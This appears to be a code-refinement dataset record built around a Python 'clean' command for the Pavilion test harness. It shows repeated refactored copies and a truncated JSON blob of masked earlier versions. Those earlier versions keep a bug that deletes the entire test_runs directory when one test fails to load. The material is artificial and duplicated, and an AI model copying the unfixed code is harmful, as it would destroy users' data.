for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
def get_month_delta(months):
    """Return the datetime `months` months *before* now.

    The time of day is preserved, and the day of the month is clamped to
    the last valid day of the target month (e.g. Mar 31 minus one month
    becomes Feb 28/29).

    Bug fixes vs. the original: `today.time` (the bound method, never
    called) was passed as the `hour` argument to `datetime()`, raising a
    TypeError that the `except ValueError` could not catch; and
    `(cur_month - months) % 12` could produce the invalid month 0.

    :param months: Number of whole months to go back.
    :returns: The cutoff datetime.
    """
    today = datetime.today()
    # Work in a flat 0-based month count so year borrowing is uniform.
    total_months = today.year * 12 + (today.month - 1) - months
    cut_year, month_index = divmod(total_months, 12)
    cut_month = month_index + 1
    # Clamp the day so e.g. "Feb 31" becomes Feb 28/29.
    last_day = monthrange(cut_year, cut_month)[1]
    cut_day = min(today.day, last_day)
    return today.replace(year=cut_year, month=cut_month, day=cut_day)
<|reserved_special_token_1|>
import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
    """Clean outdated test runs, series, downloads and builds from the
    Pavilion working directory."""

    def __init__(self):
        super().__init__(
            'clean',
            'Clean up Pavilion working directory.',
            # Fixed typo in the original short help ("diretory").
            short_help='Clean up Pavilion working directory.')

    def _setup_arguments(self, parser):
        parser.add_argument(
            '-v', '--verbose', action='store_true', default=False,
            help='Verbose output.')
        parser.add_argument(
            '--older-than', nargs='+', action='store',
            help='Set the max age of files to be removed. Can be a date '
                 'ex:"Jan 1 2019" or , or a number of days/weeks '
                 'ex:"32 weeks"')

    def run(self, pav_cfg, args):
        """Remove working-directory contents older than the --older-than
        cutoff (everything, if no cutoff was given).

        :returns: 0 on success, errno.EINVAL on an unparseable date.
        """
        cutoff_date = self._get_cutoff_date(args)
        if cutoff_date is None:
            return errno.EINVAL

        tests_dir = pav_cfg.working_dir / 'test_runs'
        series_dir = pav_cfg.working_dir / 'series'
        download_dir = pav_cfg.working_dir / 'downloads'
        build_dir = pav_cfg.working_dir / 'builds'

        incomplete_tests, dependent_builds = self._clean_tests(
            pav_cfg, tests_dir, cutoff_date, args.verbose)
        self._clean_series(series_dir, incomplete_tests, cutoff_date,
                           args.verbose)
        self._clean_downloads(download_dir, cutoff_date, args.verbose)
        self._clean_builds(build_dir, dependent_builds, cutoff_date,
                           args.verbose)
        return 0

    def _get_cutoff_date(self, args):
        """Translate the --older-than arguments into a datetime.

        :returns: The cutoff datetime, or None if the date couldn't be
            parsed (an error is printed in that case).
        """
        if not args.older_than:
            # No cutoff specified; everything is older than "now".
            return datetime.today()
        if 'day' in args.older_than or 'days' in args.older_than:
            return datetime.today() - timedelta(days=int(args.older_than[0]))
        if 'week' in args.older_than or 'weeks' in args.older_than:
            return datetime.today() - timedelta(weeks=int(args.older_than[0]))
        if 'month' in args.older_than or 'months' in args.older_than:
            return get_month_delta(int(args.older_than[0]))
        date = ' '.join(args.older_than)
        try:
            return datetime.strptime(date, '%b %d %Y')
        except (TypeError, ValueError):
            output.fprint('{} is not a valid date.'.format(args.older_than),
                          file=self.errfile, color=output.RED)
            return None

    def _clean_tests(self, pav_cfg, tests_dir, cutoff_date, verbose):
        """Remove tests older than the cutoff that aren't running/scheduled.

        :returns: (incomplete_tests, dependent_builds) - names of kept
            test dirs, and build names those kept tests still depend on.
        """
        incomplete_tests = []
        dependent_builds = []
        output.fprint('Removing Tests...', file=self.outfile,
                      color=output.GREEN)
        for test in os.listdir(tests_dir.as_posix()):
            test_path = tests_dir / test
            test_time = datetime.fromtimestamp(
                os.path.getmtime(test_path.as_posix()))
            try:
                test_obj = TestRun.load(pav_cfg, int(test))
                status = test_obj.status.current().state
            except (TestRunError, TestRunNotFoundError):
                output.fprint('Removing bad test directory {}'.format(test),
                              file=self.outfile)
                # Bug fix: the original removed the entire test_runs tree
                # here instead of just the bad test's directory.
                shutil.rmtree(test_path.as_posix())
                continue
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)
                # Bug fix: without this continue, 'status'/'test_obj'
                # would be referenced below while unbound.
                continue
            if (test_time < cutoff_date
                    and status not in (STATES.RUNNING, STATES.SCHEDULED)):
                shutil.rmtree(test_path.as_posix())
                if verbose:
                    output.fprint('Removed test {}'.format(test),
                                  file=self.outfile)
            else:
                if verbose:
                    output.fprint('Skipped test {}'.format(test),
                                  file=self.outfile)
                incomplete_tests.append(test)
                dependent_builds.append(test_obj.build_name)
        return incomplete_tests, dependent_builds

    def _clean_series(self, series_dir, incomplete_tests, cutoff_date,
                      verbose):
        """Remove old series directories that reference no kept tests."""
        output.fprint('Removing Series...', file=self.outfile,
                      color=output.GREEN)
        for series in os.listdir(series_dir.as_posix()):
            series_path = series_dir / series
            try:
                series_time = datetime.fromtimestamp(
                    os.path.getmtime(series_path.as_posix()))
                # Bug fix: computed per-series now. The original set this
                # flag once before the loop, so a single incomplete series
                # permanently blocked removal of every later one.
                removable = not any(
                    os.path.exists((series_path / test).as_posix())
                    for test in incomplete_tests)
                if series_time < cutoff_date and removable:
                    shutil.rmtree(series_path.as_posix())
                    if verbose:
                        output.fprint('Removed series {}'.format(series),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped series {}'.format(series),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)

    def _clean_downloads(self, download_dir, cutoff_date, verbose):
        """Remove downloads (dirs or plain files) older than the cutoff."""
        output.fprint('Removing Downloads...', file=self.outfile,
                      color=output.GREEN)
        for download in os.listdir(download_dir.as_posix()):
            dl_path = download_dir / download
            try:
                download_time = datetime.fromtimestamp(
                    os.path.getmtime(dl_path.as_posix()))
                if download_time < cutoff_date:
                    try:
                        shutil.rmtree(dl_path.as_posix())
                    except NotADirectoryError:
                        # Downloads may be single files; remove those too.
                        output.fprint('{} is not a directory.'
                                      .format(download),
                                      file=self.errfile, color=output.RED)
                        os.remove(dl_path.as_posix())
                    if verbose:
                        output.fprint('Removed download {}'.format(download),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped download {}'.format(download),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)

    def _clean_builds(self, build_dir, dependent_builds, cutoff_date,
                      verbose):
        """Remove old builds that no kept test still depends on."""
        output.fprint('Removing Builds...', file=self.outfile,
                      color=output.GREEN)
        for build in os.listdir(build_dir.as_posix()):
            build_path = build_dir / build
            try:
                build_time = datetime.fromtimestamp(
                    os.path.getmtime(build_path.as_posix()))
                if build_time < cutoff_date and build not in dependent_builds:
                    shutil.rmtree(build_path.as_posix())
                    if verbose:
                        output.fprint('Removed build {}'.format(build),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped build {}'.format(build),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed. '
                              .format(err[1]), file=self.errfile, color=31)
def get_month_delta(months):
    """Return the datetime `months` months *before* now.

    The time of day is preserved, and the day of the month is clamped to
    the last valid day of the target month (e.g. Mar 31 minus one month
    becomes Feb 28/29).

    Bug fixes vs. the original: `today.time` (the bound method, never
    called) was passed as the `hour` argument to `datetime()`, raising a
    TypeError that the `except ValueError` could not catch; and
    `(cur_month - months) % 12` could produce the invalid month 0.

    :param months: Number of whole months to go back.
    :returns: The cutoff datetime.
    """
    today = datetime.today()
    # Work in a flat 0-based month count so year borrowing is uniform.
    total_months = today.year * 12 + (today.month - 1) - months
    cut_year, month_index = divmod(total_months, 12)
    cut_month = month_index + 1
    # Clamp the day so e.g. "Feb 31" becomes Feb 28/29.
    last_day = monthrange(cut_year, cut_month)[1]
    cut_day = min(today.day, last_day)
    return today.replace(year=cut_year, month=cut_month, day=cut_day)
<|reserved_special_token_1|>
import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
    """Clean outdated test runs, series, downloads and builds from the
    Pavilion working directory."""

    def __init__(self):
        super().__init__(
            'clean',
            'Clean up Pavilion working directory.',
            # Fixed typo in the original short help ("diretory").
            short_help='Clean up Pavilion working directory.')

    def _setup_arguments(self, parser):
        parser.add_argument(
            '-v', '--verbose', action='store_true', default=False,
            help='Verbose output.')
        parser.add_argument(
            '--older-than', nargs='+', action='store',
            help='Set the max age of files to be removed. Can be a date '
                 'ex:"Jan 1 2019" or , or a number of days/weeks '
                 'ex:"32 weeks"')

    def run(self, pav_cfg, args):
        """Remove working-directory contents older than the --older-than
        cutoff (everything, if no cutoff was given).

        :returns: 0 on success, errno.EINVAL on an unparseable date.
        """
        cutoff_date = self._get_cutoff_date(args)
        if cutoff_date is None:
            return errno.EINVAL

        tests_dir = pav_cfg.working_dir / 'test_runs'
        series_dir = pav_cfg.working_dir / 'series'
        download_dir = pav_cfg.working_dir / 'downloads'
        build_dir = pav_cfg.working_dir / 'builds'

        incomplete_tests, dependent_builds = self._clean_tests(
            pav_cfg, tests_dir, cutoff_date, args.verbose)
        self._clean_series(series_dir, incomplete_tests, cutoff_date,
                           args.verbose)
        self._clean_downloads(download_dir, cutoff_date, args.verbose)
        self._clean_builds(build_dir, dependent_builds, cutoff_date,
                           args.verbose)
        return 0

    def _get_cutoff_date(self, args):
        """Translate the --older-than arguments into a datetime.

        :returns: The cutoff datetime, or None if the date couldn't be
            parsed (an error is printed in that case).
        """
        if not args.older_than:
            # No cutoff specified; everything is older than "now".
            return datetime.today()
        if 'day' in args.older_than or 'days' in args.older_than:
            return datetime.today() - timedelta(days=int(args.older_than[0]))
        if 'week' in args.older_than or 'weeks' in args.older_than:
            return datetime.today() - timedelta(weeks=int(args.older_than[0]))
        if 'month' in args.older_than or 'months' in args.older_than:
            return get_month_delta(int(args.older_than[0]))
        date = ' '.join(args.older_than)
        try:
            return datetime.strptime(date, '%b %d %Y')
        except (TypeError, ValueError):
            output.fprint('{} is not a valid date.'.format(args.older_than),
                          file=self.errfile, color=output.RED)
            return None

    def _clean_tests(self, pav_cfg, tests_dir, cutoff_date, verbose):
        """Remove tests older than the cutoff that aren't running/scheduled.

        :returns: (incomplete_tests, dependent_builds) - names of kept
            test dirs, and build names those kept tests still depend on.
        """
        incomplete_tests = []
        dependent_builds = []
        output.fprint('Removing Tests...', file=self.outfile,
                      color=output.GREEN)
        for test in os.listdir(tests_dir.as_posix()):
            test_path = tests_dir / test
            test_time = datetime.fromtimestamp(
                os.path.getmtime(test_path.as_posix()))
            try:
                test_obj = TestRun.load(pav_cfg, int(test))
                status = test_obj.status.current().state
            except (TestRunError, TestRunNotFoundError):
                output.fprint('Removing bad test directory {}'.format(test),
                              file=self.outfile)
                # Bug fix: the original removed the entire test_runs tree
                # here instead of just the bad test's directory.
                shutil.rmtree(test_path.as_posix())
                continue
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)
                # Bug fix: without this continue, 'status'/'test_obj'
                # would be referenced below while unbound.
                continue
            if (test_time < cutoff_date
                    and status not in (STATES.RUNNING, STATES.SCHEDULED)):
                shutil.rmtree(test_path.as_posix())
                if verbose:
                    output.fprint('Removed test {}'.format(test),
                                  file=self.outfile)
            else:
                if verbose:
                    output.fprint('Skipped test {}'.format(test),
                                  file=self.outfile)
                incomplete_tests.append(test)
                dependent_builds.append(test_obj.build_name)
        return incomplete_tests, dependent_builds

    def _clean_series(self, series_dir, incomplete_tests, cutoff_date,
                      verbose):
        """Remove old series directories that reference no kept tests."""
        output.fprint('Removing Series...', file=self.outfile,
                      color=output.GREEN)
        for series in os.listdir(series_dir.as_posix()):
            series_path = series_dir / series
            try:
                series_time = datetime.fromtimestamp(
                    os.path.getmtime(series_path.as_posix()))
                # Bug fix: computed per-series now. The original set this
                # flag once before the loop, so a single incomplete series
                # permanently blocked removal of every later one.
                removable = not any(
                    os.path.exists((series_path / test).as_posix())
                    for test in incomplete_tests)
                if series_time < cutoff_date and removable:
                    shutil.rmtree(series_path.as_posix())
                    if verbose:
                        output.fprint('Removed series {}'.format(series),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped series {}'.format(series),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)

    def _clean_downloads(self, download_dir, cutoff_date, verbose):
        """Remove downloads (dirs or plain files) older than the cutoff."""
        output.fprint('Removing Downloads...', file=self.outfile,
                      color=output.GREEN)
        for download in os.listdir(download_dir.as_posix()):
            dl_path = download_dir / download
            try:
                download_time = datetime.fromtimestamp(
                    os.path.getmtime(dl_path.as_posix()))
                if download_time < cutoff_date:
                    try:
                        shutil.rmtree(dl_path.as_posix())
                    except NotADirectoryError:
                        # Downloads may be single files; remove those too.
                        output.fprint('{} is not a directory.'
                                      .format(download),
                                      file=self.errfile, color=output.RED)
                        os.remove(dl_path.as_posix())
                    if verbose:
                        output.fprint('Removed download {}'.format(download),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped download {}'.format(download),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed'
                              .format(err[1]), file=self.errfile, color=31)

    def _clean_builds(self, build_dir, dependent_builds, cutoff_date,
                      verbose):
        """Remove old builds that no kept test still depends on."""
        output.fprint('Removing Builds...', file=self.outfile,
                      color=output.GREEN)
        for build in os.listdir(build_dir.as_posix()):
            build_path = build_dir / build
            try:
                build_time = datetime.fromtimestamp(
                    os.path.getmtime(build_path.as_posix()))
                if build_time < cutoff_date and build not in dependent_builds:
                    shutil.rmtree(build_path.as_posix())
                    if verbose:
                        output.fprint('Removed build {}'.format(build),
                                      file=self.outfile)
                elif verbose:
                    output.fprint('Skipped build {}'.format(build),
                                  file=self.outfile)
            except PermissionError as err:
                err = str(err).split("'")
                output.fprint('Permission Error: {} cannot be removed. '
                              .format(err[1]), file=self.errfile, color=31)
def get_month_delta(months):
    """Return the datetime `months` months *before* now.

    The time of day is preserved, and the day of the month is clamped to
    the last valid day of the target month (e.g. Mar 31 minus one month
    becomes Feb 28/29).

    Bug fixes vs. the original: `today.time` (the bound method, never
    called) was passed as the `hour` argument to `datetime()`, raising a
    TypeError that the `except ValueError` could not catch; and
    `(cur_month - months) % 12` could produce the invalid month 0.

    :param months: Number of whole months to go back.
    :returns: The cutoff datetime.
    """
    today = datetime.today()
    # Work in a flat 0-based month count so year borrowing is uniform.
    total_months = today.year * 12 + (today.month - 1) - months
    cut_year, month_index = divmod(total_months, 12)
    cut_month = month_index + 1
    # Clamp the day so e.g. "Feb 31" becomes Feb 28/29.
    last_day = monthrange(cut_year, cut_month)[1]
    cut_day = min(today.day, last_day)
    return today.replace(year=cut_year, month=cut_month, day=cut_day)
|
flexible
|
{
"blob_id": "18aafb71d7e6f5caa2f282126c31eb052c08ad3c",
"index": 4307,
"step-1": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n <mask token>\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test 
directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n 
os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, 
TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), 
file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, 
TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), 
